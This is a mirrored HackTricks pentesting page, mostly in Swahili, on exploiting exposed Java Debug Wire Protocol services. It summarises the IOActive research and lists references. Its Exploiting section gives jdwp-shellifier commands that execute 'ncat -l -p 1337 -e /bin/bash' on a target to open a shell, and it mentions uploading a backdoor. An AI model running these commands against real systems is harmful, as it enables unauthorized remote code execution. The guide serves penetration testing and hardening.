mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 08:01:00 +00:00
100 lines
7.6 KiB
Markdown
100 lines
7.6 KiB
Markdown
# Pentesting JDWP - Java Debug Wire Protocol
|
|
|
|
{% hint style="success" %}
|
|
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
|
|
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Mipangilio inayopatikana mara moja kwa ajili ya tathmini ya udhaifu & upimaji wa uvamizi**. Fanya pentest kamili kutoka mahali popote na zana 20+ & vipengele vinavyotoka kwenye recon hadi ripoti. Hatubadilishi wapimaji wa udhaifu - tunatengeneza zana maalum, moduli za kugundua & kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.
|
|
|
|
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
|
|
|
|
## Exploiting
|
|
|
|
Utekelezaji wa JDWP unategemea **ukosefu wa uthibitishaji na usimbaji** wa protokali. Kwa kawaida hupatikana kwenye **bandari 8000**, lakini bandari nyingine zinaweza kuwa. Muunganisho wa awali unafanywa kwa kutuma "JDWP-Handshake" kwenye bandari lengwa. Ikiwa huduma ya JDWP inafanya kazi, inajibu kwa kutumia string ile ile, ikithibitisha uwepo wake. Hii handshake inafanya kazi kama njia ya kutambua huduma za JDWP kwenye mtandao.
|
|
|
|
Kwa upande wa utambuzi wa mchakato, kutafuta string "jdwk" katika michakato ya Java kunaweza kuashiria kikao cha JDWP kinachofanya kazi.
|
|
|
|
Zana inayotumika ni [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Unaweza kuitumia na vigezo tofauti:
|
|
```bash
|
|
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
|
|
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
|
|
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
|
|
```
|
|
I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
|
|
|
|
## More details
|
|
|
|
**Hii ni muhtasari wa [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Angalia kwa maelezo zaidi.
|
|
|
|
|
|
1. **JDWP Muhtasari**:
|
|
- Ni itifaki ya mtandao ya binary inayotumia pakiti, hasa synchronous.
|
|
- Haina uthibitisho na usimbaji, hivyo inakuwa hatarini inapokuwa wazi kwa mitandao ya adui.
|
|
|
|
2. **JDWP Mkono wa Salamu**:
|
|
- Mchakato rahisi wa mkono wa salamu unatumika kuanzisha mawasiliano. Mstari wa ASCII wenye herufi 14 “JDWP-Handshake” unabadilishana kati ya Debugger (mteja) na Debuggee (server).
|
|
|
|
3. **JDWP Mawasiliano**:
|
|
- Jumbe zina muundo rahisi zikiwa na maeneo kama Urefu, Id, Bendera, na CommandSet.
|
|
- Thamani za CommandSet zinaanzia 0x40 hadi 0x80, zik representing hatua na matukio tofauti.
|
|
|
|
4. **Ushirikishaji**:
|
|
- JDWP inaruhusu kupakia na kuita madarasa na bytecode zisizo na mipaka, hivyo kuleta hatari za usalama.
|
|
- Makala inaelezea mchakato wa ushirikishaji katika hatua tano, ikihusisha kupata marejeleo ya Java Runtime, kuweka alama za kuvunja, na kuita mbinu.
|
|
|
|
5. **Ushirikishaji wa Kweli**:
|
|
- Licha ya uwezekano wa ulinzi wa firewall, huduma za JDWP zinaweza kupatikana na kuweza kushambuliwa katika hali halisi, kama inavyoonyeshwa na utafutaji kwenye majukwaa kama ShodanHQ na GitHub.
|
|
- Skripti ya ushirikishaji ilijaribiwa dhidi ya toleo mbalimbali za JDK na ni huru ya jukwaa, ikitoa Utekelezaji wa Msimbo wa K remote (RCE) wa kuaminika.
|
|
|
|
6. **Madhara ya Usalama**:
|
|
- Uwepo wa huduma za JDWP zilizo wazi mtandaoni unaonyesha hitaji la ukaguzi wa mara kwa mara wa usalama, kuzima kazi za debug katika uzalishaji, na usanidi sahihi wa firewall.
|
|
|
|
|
|
### **Marejeleo:**
|
|
|
|
* [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)]
|
|
* [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
|
|
* [http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html](http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html)
|
|
* http://www.secdev.org/projects/scapy(no longer active)
|
|
* [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE)
|
|
* http://www.hsc-news.com/archives/2013/000109.html (no longer active)
|
|
* [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt)
|
|
* https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults
|
|
* [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html)
|
|
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com)
|
|
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
|
|
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
|
|
|
|
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Mpangilio wa papo hapo kwa tathmini ya udhaifu & pentesting**. Fanya pentest kamili kutoka mahali popote na zana 20+ na vipengele vinavyotoka kwa recon hadi ripoti. Hatubadilishi pentesters - tunatengeneza zana maalum, moduli za kugundua & ushirikishaji ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.
|
|
|
|
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
|
|
|
|
{% hint style="success" %}
|
|
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
|
|
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
{% endhint %}
|